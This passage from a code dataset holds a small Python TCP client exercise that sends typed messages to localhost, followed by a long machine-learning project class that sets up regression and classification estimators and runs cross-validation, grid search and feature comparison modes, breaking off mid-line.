pass\n","sub_path":"trunk/src/py_to_3/hmi/devicePanel.py","file_name":"devicePanel.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"87653595","text":"import socket\r\n\r\n\r\nhost = \"localhost\"\r\nport = 2406\r\n\r\ntcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\r\ndestino = (host,port)\r\n\r\ntcp.connect(destino)\r\n\r\nwhile(True):\r\n\tmsg = input(\"Digite a mensagem: \")\r\n\ttcp.send(msg.encode(\"utf-8\"))\r\n\tif(msg == \"sair\"):break\r\n\t\r\ntcp.close() \r\n","sub_path":"aula Pratica/exercicio3/cliente.py","file_name":"cliente.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"237260123","text":"import sys\nimport numpy as np\nimport pandas as pd\nimport xgboost as xgb\nimport time\nimport itertools\nimport pickle\nimport copy\nfrom sklearn import neighbors as knn\nfrom sklearn import linear_model as lm\nfrom sklearn import feature_selection as fs\nfrom sklearn import model_selection as ms\nfrom sklearn.decomposition import nmf\nfrom sklearn import svm\nfrom sklearn import ensemble\nfrom sklearn import tree\nfrom sklearn import pipeline\nfrom sklearn import preprocessing\nfrom sklearn import metrics\nimport alm_data\nimport alm_ml\nimport alm_es\nimport alm_fun\nfrom datetime import datetime\nfrom numpy import gradient\n\n\nclass alm_project:\n\n def __init__(self, project_init_params, data_init_params,ml_init_params,es_init_params): \n ####*************************************************************************************************************************************************************\n # Define Project specific parameters and initialize the project \n ####*************************************************************************************************************************************************************\n # *project_name: project name\n # *project_path: project root path\n # *ml_type: classification or regression\n # *cv_split_method: [0] k_folds [1]Stratified k_folds\n # *cv_split_folds: n folds cross-validataion\n # *data_name: name of the datasets\n # *test_file: the file path for the test dataset\n # *train_file: the file path for the training dataset\n # *extra_train_file: the file path for the extra training dataset\n # *use_extra_train_data: whether you are going to use the extra training dataset \n # *dependent_variable: the column name for the dependent variable\n # *onehot_features: features are categorical (may be can be detected automatically later)\n # *initial_features: features used in the analysis\n # *train_features: features used for training\n # *compare_features: features used to compare performance individually\n # *interaction_features: features used to study feature interaction\n # *interaction_features_name: name of the features or feature groups used to study feature interaction\n # *percent_min_feature: remove the feature if the missing data of this feature is lower than percent_min_feature% \n ####*************************************************************************************************************************************************************\n for key in project_init_params:\n setattr(self, key, project_init_params[key])\n \n #***************************************************************************************************************************************************************\n # initialize alphame ml object\n #***************************************************************************************************************************************************************\n self.ml = alm_ml.alm_ml(ml_init_params)\n \n #***************************************************************************************************************************************************************\n # initialize alphame estimators\n #***************************************************************************************************************************************************************\n self.estimators = self.construct_estimators(es_init_params)\n \n #***************************************************************************************************************************************************************\n # initialize alphame dataset parameters (share with different datasets)\n #***************************************************************************************************************************************************************\n self.data = {}\n for i in range(len(self.data_names)): \n data_init_params['name'] = self.data_names[i] \n if self.input_data_type[i] == 'file':\n if self.target_data[i] is None:\n data_init_params['target_data_original_df'] = pd.DataFrame()\n else: \n data_init_params['target_data_original_df'] = pd.read_csv(self.target_data[i])\n \n if self.train_data[i] is None: \n data_init_params['train_data_original_df'] = pd.DataFrame()\n else:\n data_init_params['train_data_original_df'] = pd.read_csv(self.train_data[i])\n \n if self.test_data[i] is None: \n data_init_params['test_data_original_df'] = pd.DataFrame()\n else:\n data_init_params['test_data_original_df'] = pd.read_csv(self.test_data[i])\n \n if self.extra_train_data[i] is None:\n data_init_params['extra_train_data_original_df'] = pd.DataFrame()\n else: \n data_init_params['extra_train_data_original_df'] = pd.read_csv(self.extra_train_data[i])\n \n data_init_params['use_extra_train_data'] = self.use_extra_train_data[i] \n \n if self.input_data_type[i] == 'dataframe':\n data_init_params['target_data_original_df'] = self.target_data[i]\n data_init_params['train_data_original_df'] = self.train_data[i]\n data_init_params['test_data_original_df'] = self.test_data[i]\n data_init_params['extra_train_data_original_df'] = self.extra_train_data[i]\n data_init_params['use_extra_train_data'] = self.use_extra_train_data[i] \n self.data[self.data_names[i]] = alm_data.alm_data(data_init_params)\n\n alm_fun.show_msg(self.log,self.verbose,'Class: [alm_project] [__init__]......done @' + str(datetime.now()))\n\n def construct_estimators(self, es_init_params):\n es = []\n es_names = []\n es_gs_range = []\n es_scores = []\n es_score_directions = []\n es_importance = []\n es_type = []\n estimators = {}\n \n #***************************************************************************************************************************************************************\n # Regression\n #***************************************************************************************************************************************************************\n # None Regressor\n es.append(None)\n es_scores.append('rmse')\n es_score_directions.append(0)\n es_gs_range.append({})\n es_names.append(\"None\")\n es_importance.append('none')\n es_type.append('regression') \n \n #Decision Tree Regressor\n es.append(tree.DecisionTreeRegressor(**{'max_depth':3})) \n es_scores.append('rmse')\n es_score_directions.append(0)\n es_gs_range.append({'max_depth': np.arange(1, 10, 1)})\n es_names.append(\"dct_r\")\n es_importance.append('feature_importances_')\n es_type.append('regression') \n \n # kNN Regressor\n es.append(knn.KNeighborsRegressor(**{'n_neighbors': 7, 'weights': 'uniform', 'n_jobs':-1}))\n es_scores.append('rmse')\n es_score_directions.append(0)\n es_gs_range.append({'n_neighbors': np.arange(1, 100, 1)})\n es_names.append(\"knn_r\")\n es_importance.append('none')\n es_type.append('regression')\n \n # Bayesian Ridge Regression \n es.append(lm.BayesianRidge())\n es_scores.append('rmse')\n es_score_directions.append(0)\n es_gs_range.append({})\n es_names.append(\"brr_r\")\n es_importance.append('coef_') \n es_type.append('regression') \n \n # xgb Regressor\n es.append(xgb.XGBRegressor(**{'subsample': 0.8, 'colsample_bytree': 1, 'max_depth': 3, 'n_estimators': 100, 'learning_rate': 0.02, 'n_jobs': 8}))\n es_scores.append('rmse')\n es_score_directions.append(0)\n es_gs_range.append({'learning_rate':np.arange(0.01, 0.11, 0.01), 'max_depth': np.arange(3, 6, 1), 'n_estimators':range(100, 500, 100)})\n es_names.append(\"xgb_r\")\n es_importance.append('feature_importances_')\n es_type.append('regression')\n \n # Random Forest Regressor\n es.append(ensemble.RandomForestRegressor(**{'n_jobs':-1, 'n_estimators': 200, 'max_features': 'auto'}))\n es_scores.append('rmse')\n es_score_directions.append(0)\n es_gs_range.append({'n_estimators':range(100, 500, 100), 'max_features':np.arange(0.1, 1.0, 0.1)})\n es_names.append(\"rf_r\")\n es_importance.append('feature_importances_') \n es_type.append('regression')\n \n # ElasticNet Regressor\n es.append(lm.ElasticNet(alpha=0.01, l1_ratio=0.5))\n es_scores.append('rmse')\n es_score_directions.append(0)\n es_gs_range.append({'alpha':np.arange(0, 1, 0.1), 'l1_ratio':np.arange(0, 1, 0.1)})\n es_names.append(\"en_r\")\n es_importance.append('coef_') \n es_type.append('regression') \n \n #SVM Regressor\n es.append(svm.SVR(C=1.0, epsilon=0.1,kernel='linear'))\n es_scores.append('rmse')\n es_score_directions.append(0)\n es_gs_range.append({})\n es_names.append(\"svm_r\")\n es_importance.append('coef_') \n es_type.append('regression') \n \n #AdaBoost ElasticNet Regressor\n es.append(ensemble.AdaBoostRegressor(lm.ElasticNet(alpha=0.1, l1_ratio=0.5),n_estimators=500, random_state=0))\n es_scores.append('rmse')\n es_score_directions.append(0)\n es_gs_range.append({})\n es_names.append(\"ada_en_r\")\n es_importance.append('none') \n es_type.append('regression') \n \n #Keras regressor for classification \n es.append(None)\n es_scores.append('rmse')\n es_score_directions.append(0)\n es_gs_range.append(None)\n es_names.append(\"keras_r\")\n es_importance.append('none')\n es_type.append('regression')\n \n \n #***************************************************************************************************************************************************************\n # Binary classification \n #*************************************************************************************************************************************************************** \n # None Classification\n es.append(None)\n es_scores.append('auroc')\n es_score_directions.append(1)\n es_gs_range.append({})\n es_names.append(\"None\")\n es_importance.append('none')\n es_type.append('classification_binary') \n \n \n #Decision tree regressor for classification\n es.append(tree.DecisionTreeRegressor(**{'max_depth':5})) \n es_scores.append('auprc')\n es_score_directions.append(1)\n es_gs_range.append({'max_depth': np.arange(1, 10, 1)})\n es_names.append(\"dct_r_c\")\n es_importance.append('feature_importances_')\n es_type.append('classification_binary') \n \n #Decision tree classifier\n es.append(tree.DecisionTreeClassifier(**{'max_depth':5})) \n es_scores.append('auprc')\n es_score_directions.append(1)\n es_gs_range.append({'max_depth': np.arange(1, 10, 1)})\n es_names.append(\"dct_c\")\n es_importance.append('feature_importances_')\n es_type.append('classification_binary') \n \n # Gradient boosted tree regressor for classification\n# es.append(xgb.XGBRegressor(**{'n_jobs': 8,'subsample': 0.8, 'colsample_bytree': 1, 'max_depth': 3, 'n_estimators': 100, 'learning_rate': 0.02}))\n es.append(xgb.XGBRegressor(**{'n_jobs': 8}))\n es_scores.append('auprc')\n es_score_directions.append(1)\n es_gs_range.append({'learning_rate':np.arange(0.01, 0.06, 0.01), 'max_depth': np.arange(3, 5, 1), 'n_estimators':range(100, 400, 100)})\n es_names.append(\"xgb_r_c\")\n es_importance.append('booster')\n es_type.append('classification_binary')\n \n # Gradient boosted tree Classifier\n es.append(xgb.XGBClassifier())\n es_scores.append('auroc')\n es_score_directions.append(1)\n es_gs_range.append({'learning_rate':np.arange(0.01, 0.1, 0.01), 'max_depth': np.arange(3, 6, 1), 'n_estimators':range(100, 500, 100)})\n es_names.append(\"xgb_c\")\n es_importance.append('booster')\n es_type.append('classification_binary')\n \n # Random Forest regressor for classification\n# es.append(ensemble.RandomForestRegressor(**{'n_jobs':-1, 'n_estimators': 200, 'max_features': 'auto'}))\n es.append(ensemble.RandomForestRegressor())\n es_scores.append('auroc')\n es_score_directions.append(1)\n es_gs_range.append({'max_features':range(10, 100, 10), 'n_estimators':range(100, 200, 100), 'test_bs_result':['True', 'False']})\n es_names.append(\"rf_r_c\")\n es_importance.append('feature_importances_')\n es_type.append('classification_binary')\n \n # Random Forest Classifier\n es.append(ensemble.RandomForestClassifier(**{'n_jobs':-1, 'n_estimators': 200, 'max_features': 'auto'}))\n es_scores.append('auroc')\n es_score_directions.append(1)\n es_gs_range.append({'max_features':range(10, 100, 10), 'n_estimators':range(100, 200, 100), 'test_bs_result':['True', 'False']})\n es_names.append(\"rf_c\")\n es_importance.append('feature_importances_')\n es_type.append('classification_binary') \n \n \n # ElasticNet Regressor for classification\n# es.append(lm.ElasticNet(alpha=0.01, l1_ratio=0.5))\n es.append(lm.ElasticNet())\n es_scores.append('auroc')\n es_score_directions.append(0)\n es_gs_range.append({'alpha':np.arange(0, 1, 0.1), 'l1_ratio':np.arange(0, 1, 0.1)})\n es_names.append(\"en_r_c\")\n es_importance.append('coef_') \n es_type.append('classification_binary') \n \n \n # Logistic Regression Classifier (binary)\n es.append(lm.LogisticRegression())\n es_scores.append('auroc')\n es_score_directions.append(1)\n es_gs_range.append({})\n es_names.append(\"lgr_c\")\n es_importance.append('coef_')\n es_type.append('classification_binary')\n \n # KNN Classifier (binary) \n es.append(knn.KNeighborsClassifier(**{'n_neighbors': 10, 'weights': 'distance', 'n_jobs':-1}))\n es_scores.append('auroc')\n es_score_directions.append(1)\n es_gs_range.append({})\n es_names.append(\"knn_c\")\n es_importance.append('none')\n es_type.append('classification_binary')\n \n # SVM Regressor for classification \n es.append(svm.SVR(C=1.0, epsilon=0.1,kernel='linear'))\n es_scores.append('auroc')\n es_score_directions.append(1)\n es_gs_range.append({})\n es_names.append(\"svm_r_c\")\n es_importance.append('coef_') \n es_type.append('classification_binary') \n \n # SVM Classifier \n es.append(svm.SVC(**{'C': 1.0}))\n es_scores.append('auroc')\n es_score_directions.append(1)\n es_gs_range.append({})\n es_names.append(\"svm_c\")\n es_importance.append('coef_')\n es_type.append('classification_binary')\n \n #Keras regressor for classification \n es.append(None)\n es_scores.append('auprc')\n es_score_directions.append(1)\n es_gs_range.append(None)\n es_names.append(\"keras_r_c\")\n es_importance.append('none')\n es_type.append('classification_binary')\n \n \n# #Tensor flow classifier\n# es.append(alphame_ml.alm_tf(**{'estimator_name': 'DNNClassifier', 'loss_name': 'cross_entropy', 'hidden_units': [100],\n# 'activation_fn': tf.nn.sigmoid,'n_classes': 2, 'batch_gd': 1,'batch_size': 0,'num_epochs': 20000, 'learning_rate': 0.0003}) )\n# es_scores.append('auroc')\n# es_score_directions.append(1)\n# es_gs_range.append({})\n# es_names.append(\"tf_c\") \n# es_importance.append('none')\n# es_type.append('classification_binary')\n \n# #Neural Network (Tensorflow)\n# es.append(alphame_ml.alm_tf())\n# es_scores.append('neg_log_loss')\n# es_score_directions.append(0)\n# es_gs_range.append({'leraning_rate':[0.01,0.1]})\n# es_names.append(\"nn_c\")\n# es_importance.append('none')\n# es_type.append('classification_multiclass')\n \n #***************************************************************************************************************************************************************\n # multi-class classification \n #*************************************************************************************************************************************************************** \n # xgb \n es.append(xgb.XGBClassifier(**{'subsample': 0.9, 'colsample_bytree': 1, 'max_depth': 5, 'n_estimators': 200, 'learning_rate': 0.05}))\n es_scores.append('neg_log_loss')\n es_score_directions.append(0)\n es_gs_range.append({'learning_rate':[0.01, 0.02, 0.03, 0.04, 0.05, 0.06, 0.07, 0.08, 0.09, 0.1], 'max_depth': [3, 5]})\n # es_gs_range.append({ 'subsample':[i/10.0 for i in range(6,10)],'colsample_bytree':[i/10.0 for i in range(6,10)]})\n es_names.append(\"xgb_c\")\n es_importance.append('feature_importances_')\n es_type.append('classification_multiclass')\n\n # Random Forest Classifier\n es.append(ensemble.RandomForestClassifier(**{'n_jobs':-1, 'n_estimators': 200, 'max_features': 'auto'}))\n es_scores.append('neg_log_loss')\n es_score_directions.append(0)\n es_gs_range.append({'max_features':range(10, 100, 10), 'n_estimators':range(100, 200, 100), 'test_bs_result':['True', 'False']})\n es_names.append(\"rf_c\")\n es_importance.append('feature_importances_')\n es_type.append('classification_multiclass')\n\n # Gradient Boost Tree Classifier\n es.append(ensemble.GradientBoostingClassifier(**{'n_estimators': 200, 'max_features': 'auto', 'max_depth': 3}))\n es_scores.append('neg_log_loss')\n es_score_directions.append(0)\n es_gs_range.append({})\n es_names.append(\"gbt_c\") \n es_importance.append('feature_importances_') \n es_type.append('classification_multiclass')\n \n # Logistic Regression Classifier (multi-class)\n es.append(lm.LogisticRegression())\n es_scores.append('neg_log_loss')\n es_score_directions.append(1)\n es_gs_range.append({})\n es_names.append(\"lgr_c\")\n es_importance.append('coef_')\n es_type.append('classification_multiclass')\n \n # KNN Classifier (multi-class)\n es.append(knn.KNeighborsClassifier(**{'n_neighbors': 10, 'weights': 'distance', 'n_jobs':-1}))\n es_scores.append('neg_log_loss')\n es_score_directions.append(1)\n es_gs_range.append({})\n es_names.append(\"knn_c\")\n es_importance.append('none')\n es_type.append('classification_multiclass')\n \n # SVM Classifier \n es.append(svm.SVC(**{'C': 1.0, 'kernel': 'linear', 'probability': True}))\n es_scores.append('neg_log_loss')\n es_score_directions.append(1)\n es_gs_range.append({})\n es_names.append(\"svm_c\")\n es_importance.append('coef_')\n es_type.append('classification_multiclass')\n \n for i in range(len(es)):\n if es_type[i] == es_init_params['ml_type']:\n es_init_params['single_feature_as_prediction'] = 1\n es_init_params['estimator'] = es[i]\n es_init_params['name'] = es_names[i]\n es_init_params['gs_range'] = es_gs_range[i]\n es_init_params['score_name'] = es_scores[i]\n es_init_params['score_direction'] = es_score_directions[i]\n es_init_params['feature_importance_name'] = es_importance[i]\n es_init_params['prediction_transformation'] = None\n estimators[es_names[i]] = alm_es.alm_es(es_init_params)\n return estimators\n \n def run(self,refresh_data = 0, nofit = 0): \n return_objs = {}\n self.estimators[self.run_estimator_name].score_name = self.run_estimator_scorename \n \n # refresh data first \n \n for data_name in self.run_data_names: \n stime1 = time.time()\n self.data[data_name].train_features = self.train_features \n if refresh_data == 1: \n self.data[data_name].refresh_data()\n etime1 = time.time()\n# alm_fun.show_msg(self.log,self.verbose,\"Class: [alm_project] Fun: [run] -- Current Modes: \" + str(self.modes) + \" Current Data: \" + data_name + \", data preparation time was %g seconds\" % (etime1 - stime1)) \n \n for mode in self.modes: \n return_objs[mode] = {} \n for data_name in self.run_data_names:\n stime2 = time.time()\n #**************************************************************************\n # run project in different mode \n #**************************************************************************\n if mode == 'target_prediction': \n r = self.ml.run_target_prediction(self.estimators[self.run_estimator_name], self.data[data_name],nofit = nofit)\n return_objs[mode][data_name] = r['target_y_predicted']\n \n if mode == 'test_prediction':\n if self.grid_search_on == 1: \n r = self.ml.grid_search(self.estimators[self.run_estimator_name], self.data[data_name])\n alm_fun.show_msg(self.log,self.verbose,'grid search best socre:' + str(r['gs_opt_cv_score']) + 'and best parameters:' + str(r['gs_opt_params'])) \n \n r = self.ml.run_test_prediction(self.estimators[self.run_estimator_name], self.data[data_name],nofit = nofit)\n test_y_predicted = r['test_y_predicted'] \n test_bs_result = r['test_bs_result']\n test_bs_result.columns = ['test_' + x for x in test_bs_result.columns] \n feature_importance = r['feature_importance']\n# alm_fun.show_msg(self.log,self.verbose,str(test_bs_result))\n# alm_fun.show_msg(self.log,self.verbose,str(feature_importance)) \n test_bs_result.to_csv(self.project_path + data_name +'_test_results' + '_fold_' + str(self.data[data_name].cur_test_split_fold) + '_' + str(self.data[data_name].cur_gradient_key) +'.csv') \n return_objs[mode][data_name] = [test_bs_result,feature_importance,test_y_predicted]\n \n if mode == 'test_prediction_all_folds':\n tp_results = None\n tp_predictions = None\n feature_importance = None\n \n for j in range(self.data[data_name].test_split_folds):\n self.data[data_name].cur_test_split_fold = j \n self.data[data_name].train_features = self.cv_selected_features[j]\n\n if self.grid_search_on == 1: \n r = self.ml.grid_search(self.estimators[self.run_estimator_name], self.data[data_name])\n alm_fun.show_msg(self.log,self.verbose,'grid search best socre:' + str(r['gs_opt_cv_score']) + 'and best parameters:' + str(r['gs_opt_params'])) \n \n if (self.outloop_cv_fit_once == 1) & (j!= 0): \n r = self.ml.run_test_prediction(self.estimators[self.run_estimator_name], self.data[data_name], nofit = 1) \n else:\n r = self.ml.run_test_prediction(self.estimators[self.run_estimator_name], self.data[data_name], nofit = 0)\n \n feature_fold_importance = r['feature_importance'].reset_index()\n feature_fold_importance.columns = ['feature',str(j)] \n tp_fold_predictions = r['test_y_predicted'] \n tp_fold_results = r['test_bs_result']\n tp_fold_results.columns = ['test_' + x for x in tp_fold_results.columns]\n\n if feature_importance is None:\n feature_importance = feature_fold_importance\n else:\n feature_importance = pd.merge(feature_importance,feature_fold_importance)\n \n if tp_results is None:\n tp_results = tp_fold_results\n else:\n tp_results = pd.concat([tp_results,tp_fold_results]) \n \n if self.data[data_name].if_engineer:\n predition_labels = self.data[data_name].test_splits_engineered_df[self.data[data_name].cur_test_split_fold][self.data[data_name].cur_gradient][self.data[data_name].dependent_variable] \n else:\n predition_labels = self.data[data_name].test_data_index_df.loc[self.data[data_name].test_splits_df[self.data[data_name].cur_test_split_fold][self.data[data_name].cur_gradient_key],self.data[data_name].dependent_variable] \n \n tp_fold_predictions = pd.concat([tp_fold_predictions, predition_labels], axis=1)\n\n if tp_predictions is None:\n tp_predictions = tp_fold_predictions\n else:\n tp_predictions = pd.concat([tp_predictions,tp_fold_predictions])\n \n tp_final_results = tp_results.reset_index() \n tp_final_results.to_csv(self.project_path + data_name +'_test_predition_folds_results.csv') \n\n# alm_fun.show_msg(self.log,self.verbose,str(tp_results)) \n tp_final_results = tp_final_results.groupby(['index'])['test_auroc','test_auprc','test_rfp','test_prior'].agg(['mean','std']) \n tp_final_results.columns = ['test_macro_auroc_mean','test_macro_auroc_std','test_macro_auprc_mean','test_macro_auprc_std','test_macro_rfp_mean','test_macro_rfp_std','test_prior_mean','test_prior_std']\n tp_final_results.index = [self.predictor_name]\n \n tp_predictions.columns = [self.predictor_name,'label']\n tp_micro_preditions = tp_predictions.apply(lambda x: np.array([alm_fun.classification_metrics(np.array(tp_predictions['label']),np.array(x))[1][y] for y in ['auroc','auprc','recall_fixed_precision']]),axis = 0)\n tp_micro_preditions.drop(columns = {'label'},inplace = True)\n tp_micro_preditions = tp_micro_preditions.transpose()\n\n tp_micro_preditions.columns = ['test_micro_auroc','test_micro_auprc','test_micro_rfp'] \n tp_final_results = pd.concat([tp_final_results,tp_micro_preditions],axis = 1) \n alm_fun.show_msg(self.log,self.verbose,str(tp_final_results))\n \n tp_final_results.to_csv(self.project_path + data_name +'_test_predition_all_folds_results.csv') \n return_objs[mode][data_name] = [tp_results,tp_predictions,feature_importance,tp_final_results]\n \n if mode == \"cross_validation_all_folds\":\n cv_results = None\n for j in range(self.data[data_name].test_split_folds):\n self.data[data_name].cur_test_split_fold = j \n self.data[data_name].train_features = self.cv_selected_features[j]\n if self.grid_search_on == 1: \n [gs_opt_params, validation_cv_fold_result, gs_fold_results] = self.ml.grid_search(self.estimators[self.run_estimator_name], self.data[data_name])\n [test_y_predicted, feature_importance, test_bs_fold_result, test_bs_score] = self.ml.run_test_prediction(self.estimators[self.run_estimator_name], self.data[data_name])\n alm_fun.show_msg(self.log,self.verbose,'all_features - cv:' + str(validation_cv_fold_result['mean']) + ' ' + str(validation_cv_fold_result['ste']) + ' test:' + str(test_bs_score['mean']) + ' ' + str(test_bs_score['ste']) + \" parameters:\" + str(gs_opt_params))\n else:\n if ((self.outloop_cv_fit_once == 1) & (j!= 0)): \n cv_fold_result = self.ml.run_cv_prediction(self.estimators[self.run_estimator_name], self.data[data_name],nofit = 1)\n else:\n cv_fold_result = self.ml.run_cv_prediction(self.estimators[self.run_estimator_name], self.data[data_name],nofit = 0)\n train_cv_fold_result = cv_fold_result['train_cv_result'] \n train_cv_fold_result.columns = ['train_' + x for x in train_cv_fold_result.columns]\n \n validation_cv_fold_result = cv_fold_result['validation_cv_result'] \n validation_cv_fold_result.columns = ['validation_' + x for x in validation_cv_fold_result.columns]\n \n# test_result = self.ml.run_test_prediction(self.estimators[self.run_estimator_name], self.data[data_name],nofit = 1)\n# test_bs_result = test_result['test_bs_result']\n# test_bs_result.columns = ['test_' + x for x in test_bs_result.columns]\n \n cv_fold_results = pd.concat([train_cv_fold_result,validation_cv_fold_result],axis = 1) \n cv_fold_results['fold'] = j \n if cv_results is None:\n cv_results = cv_fold_results\n else:\n cv_results = pd.concat([cv_results,cv_fold_results]) \n \n# alm_fun.show_msg(self.log,self.verbose,str(cv_results))\n return_objs[mode][data_name] = [cv_results]\n \n \n if mode == 'cross_validation':\n if self.grid_search_on == 1: \n [gs_opt_params, validation_cv_result, gs_results] = self.ml.grid_search(self.estimators[self.run_estimator_name], self.data[data_name])\n [test_y_predicted, feature_importance, test_bs_result, test_bs_score] = self.ml.run_test_prediction(self.estimators[self.run_estimator_name], self.data[data_name])\n alm_fun.show_msg(self.log,self.verbose,'all_features - cv:' + str(validation_cv_result['mean']) + ' ' + str(validation_cv_result['ste']) + ' test:' + str(test_bs_score['mean']) + ' ' + str(test_bs_score['ste']) + \" parameters:\" + str(gs_opt_params))\n else:\n cv_result = self.ml.run_cv_prediction(self.estimators[self.run_estimator_name], self.data[data_name]) \n validation_cv_result = cv_result['validation_cv_result'] \n validation_cv_result.columns = ['cv_' + x for x in validation_cv_result.columns]\n train_cv_result = cv_result['train_cv_result'] \n train_cv_result.columns = ['cv_' + x for x in train_cv_result.columns]\n \n return_objs[mode][data_name] = [validation_cv_result, train_cv_result]\n \n if mode == 'gradient_comparison': \n gc_results = pd.DataFrame(columns = ['params','gradient','cv_score','cv_score_ste'])\n for gradient in ['no_gradient'] + self.data[data_name].gradients:\n self.data[data_name].cur_gradient_key = gradient\n if self.grid_search_on == 1: \n [gs_opt_params, validation_cv_result, gs_results] = self.ml.grid_search(self.estimators[self.run_estimator_name], self.data[data_name],self.data[data_name].cur_test_split_fold,gradient,self.data[data_name].if_engineer) \n cur_params = gs_opt_params\n cur_cv_score = validation_cv_result.get_values()[0] \n else:\n cv_result = self.ml.run_cv_prediction(self.estimators[self.run_estimator_name], self.data[data_name])\n cur_cv_score = cv_result['validation_cv_score']\n cur_cv_score_ste = cv_result['validation_cv_score_ste']\n cur_params = self.estimators[self.run_estimator_name].estimator.get_params()\n \n gc_results.loc[gradient,'params'] = str(cur_params)\n gc_results.loc[gradient,'gradient'] = gradient\n gc_results.loc[gradient,'cv_score'] = cur_cv_score\n gc_results.loc[gradient,'cv_score_se'] = cur_cv_score_ste\n \n if self.estimators[self.run_estimator_name].score_direction == 1: \n opt_score = max(gc_results['cv_score'])\n else:\n opt_score = min(gc_results['cv_score'])\n \n opt_gradient = gc_results.loc[gc_results['cv_score'] == opt_score, 'gradient'].get_values()[0]\n alm_fun.show_msg(self.log,self.verbose,str(gc_results)) \n gc_results.to_csv(self.project_path + data_name +'_gradient_comparison_results.csv', encoding='utf-8') \n return_objs[mode][data_name] = [gc_results,opt_score,opt_gradient]\n \n if mode == 'feature_selection': \n args = {}\n args['start_features'] = self.ml.fs_start_features\n args['T'] = self.ml.fs_T\n args['alpha'] = self.ml.fs_alpha\n args['K'] = self.ml.fs_K\n args['epsilon'] = self.ml.fs_epsilon\n \n fs_results = self.ml.feature_selection(self.estimators[self.run_estimator_name], self.data[data_name], type='local search', args=args) \n \n max_score = max(fs_results['score'])\n opt_features = fs_results.loc[fs_results['score'] == max_score,'features']\n \n fs_results.to_csv(self.project_path + data_name +'_feature_selection_results_' + str(self.data[data_name].cur_test_split_fold) + '.csv', encoding='utf-8')\n return_objs[mode][data_name] = [fs_results,max_score,opt_features]\n \n if mode == 'method_comparison':\n mc_results = None\n methods = list(self.estimators.keys())\n if 'None' in methods:\n methods.remove('None')\n\n for method in self.compare_methods: \n \n if self.grid_search_on == 1: \n [gs_opt_params, validation_cv_result, gs_results] = self.ml.grid_search(self.estimators[method], self.data[data_name])\n \n cv_result = self.ml.run_cv_prediction(self.estimators[method], self.data[data_name])\n test_result = self.ml.run_test_prediction(self.estimators[method], self.data[data_name]) \n validation_cv_result = cv_result['validation_cv_result'] \n validation_cv_result.index = [method]\n validation_cv_result.columns = ['cv_' + x for x in validation_cv_result.columns]\n \n test_bs_result = test_result['test_bs_result']\n test_bs_result.index = [method]\n test_bs_result.columns = ['test_' + x for x in test_bs_result.columns] \n \n if mc_results is None: \n mc_results = pd.concat([validation_cv_result, test_bs_result], axis=1)\n else:\n mc_results = pd.concat([mc_results, pd.concat([validation_cv_result, test_bs_result], axis=1)]) \n \n mc_results.to_csv(self.project_path + data_name +'_method_comparison_results.csv', encoding='utf-8') \n alm_fun.show_msg(self.log,self.verbose,str(mc_results))\n return_objs[mode][data_name] = mc_results\n \n if mode == 'grid_search':\n [gs_opt_params, gs_opt_score, gs_results] = self.ml.grid_search(self.estimators[self.run_estimator_name], self.data[data_name])\n max_score = gs_opt_score['mean'].get_values()[0]\n gs_results.to_csv(self.project_path + 'grid_search_results.csv', encoding='utf-8')\n return_objs[mode][data_name] = [gs_results,max_score,gs_opt_params]\n\n if mode == 'feature_comparison_test':\n fc_results = None\n fc_predictions_xyz = None\n \n for j in range(self.data[data_name].test_split_folds):\n self.data[data_name].cur_test_split_fold = j \n fc_fold_results = None\n fc_fold_predictions = None \n for i in range(len(self.compare_features)):\n self.data[data_name].train_features = self.compare_features[i]\n r = self.ml.run_test_prediction(self.estimators[self.run_estimator_name], self.data[data_name]) \n test_bs_result = r['test_bs_result']\n test_predictions = r['test_y_predicted']\n# test_predictions = r['test_bs_result']\n \n test_bs_result.index = [self.compare_features_name[i]]\n test_bs_result.columns = ['test_' + x for x in test_bs_result.columns] \n \n if fc_fold_results is None: \n fc_fold_results = test_bs_result\n else:\n fc_fold_results = pd.concat([fc_fold_results, test_bs_result])\n \n if fc_fold_predictions is None: \n fc_fold_predictions = test_predictions\n else:\n fc_fold_predictions = pd.concat([fc_fold_predictions, test_predictions], axis=1) \n \n alm_fun.show_msg(self.log,self.verbose,self.compare_features_name[i])\n \n if self.data[data_name].if_engineer:\n predition_labels = self.data[data_name].test_splits_engineered_df[self.data[data_name].cur_test_split_fold][self.data[data_name].cur_gradient][self.data[data_name].dependent_variable] \n else:\n predition_labels = self.data[data_name].test_data_index_df.loc[self.data[data_name].test_splits_df[self.data[data_name].cur_test_split_fold][self.data[data_name].cur_gradient_key],self.data[data_name].dependent_variable] \n \n fc_fold_predictions = pd.concat([fc_fold_predictions, predition_labels], axis=1)\n \n if fc_results is None:\n fc_results = fc_fold_results\n else:\n fc_results = pd.concat([fc_results,fc_fold_results]) \n \n if fc_predictions_xyz is None:\n fc_predictions_xyz = fc_fold_predictions\n else:\n fc_predictions_xyz = pd.concat([fc_predictions_xyz,fc_fold_predictions])\n \n fc_results = fc_results.reset_index() \n fc_results = fc_results.groupby(['index'])['test_auroc','test_auprc','test_rfp','test_prior'].agg(['mean','std']) \n fc_results.columns = ['test_macro_auroc_mean','test_macro_auroc_std','test_macro_auprc_mean','test_macro_auprc_std','test_macro_rfp_mean','test_macro_rfp_std','test_prior_mean','test_prior_std']\n\n fc_predictions_xyz.columns = self.compare_features_name + ['fitness'] \n fc_micro_preditions_xyz = fc_predictions_xyz.apply(lambda x: np.array([alm_fun.classification_metrics(np.array(fc_predictions_xyz['fitness']),np.array(x))[1][y] for y in ['auroc','auprc','recall_fixed_precision']]),axis = 0)\n fc_micro_preditions_xyz.drop(columns = {'fitness'},inplace = True)\n fc_micro_preditions_xyz = fc_micro_preditions_xyz.transpose()\n fc_micro_preditions_xyz.columns = ['test_micro_auroc','test_micro_auprc','test_micro_rfp']\n \n fc_results = pd.concat([fc_results,fc_micro_preditions_xyz],axis = 1)\n fc_results = fc_results.sort_values('test_micro_auprc',ascending = False)\n fc_predictions_xyz.to_csv(self.project_path + 'output/' + data_name +'_fc_predictions.csv',index = False)\n alm_fun.show_msg(self.log,self.verbose,str(fc_results))\n \n if mode == 'feature_comparison':\n fc_results = None\n fc_predictions = None\n \n for i in range(len(self.compare_features)):\n self.data[data_name].train_features = self.compare_features[i]\n if self.grid_search_on == 1: \n r = 